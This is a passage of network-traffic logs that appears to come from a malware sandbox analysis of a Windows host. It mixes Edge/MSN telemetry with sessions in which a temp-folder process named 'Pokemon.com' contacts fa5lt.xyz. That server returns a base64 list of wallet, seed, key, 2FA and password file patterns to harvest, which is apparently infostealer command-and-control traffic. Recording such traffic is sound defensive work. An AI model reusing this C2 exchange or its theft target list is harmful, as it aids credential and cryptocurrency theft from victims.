                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=6d02dd4483824c70b935c78e1a27120a; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:32 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 3263
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:32 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    36192.168.2.54999520.110.205.1194434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:32 UTC1261OUTGET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:33 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=.msn.com; expires=Wed, 21-Jan-2026 13:47:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=c.msn.com; expires=Wed, 21-Jan-2026 13:47:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 13:47:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 13:57:32 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:32 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:33 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    37192.168.2.550001116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:33 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Q90R9HVAI58YU3ECJEKX
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 48 56 41 49 35 38 59 55 33 45 43 4a 45 4b 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------Q90R9HVAI58YU3ECJEKXContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q90R9HVAI58YU3ECJEKXCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:33 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:34 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    38192.168.2.550016116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:35 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----WTR1NG4W47G47Q16PZM7
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 453
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:35 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 52 31 4e 47 34 57 34 37 47 34 37 51 31 36 50 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 31 4e 47 34 57 34 37 47 34 37 51 31 36 50 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 31 4e 47 34 57 34 37 47 34 37 51 31 36 50 5a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------WTR1NG4W47G47Q16PZM7Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------WTR1NG4W47G47Q16PZM7Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WTR1NG4W47G47Q16PZM7Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:36 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    39192.168.2.55002120.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:37 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254838&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 11944
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:37 UTC11944OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 33 34 2e 38 33 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:34.836Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=d606badb4784465982a84eefb423c613&HASH=d606&LV=202412&V=4&LU=1735307258495; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=67cfcc3ea109463fb37e501bfd1f2e78; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 3657
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:38 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    40192.168.2.55002420.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:37 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254841&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5219
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:37 UTC5219OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 33 34 2e 38 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:34.840Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=53d2deddb78a474796f164c5bdcf51a2&HASH=53d2&LV=202412&V=4&LU=1735307258065; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=8ff97f6c91024080a2fd8d85383ca963; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 3224
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:37 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    41192.168.2.55002520.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255691&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5417
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC5417OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 33 35 2e 36 39 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T13:47:35.690Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=78704492d3c8473e8511e36dc24771fe&HASH=7870&LV=202412&V=4&LU=1735307258559; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=968cf1d13f7f46ebb7821871c65439e0; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2868
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
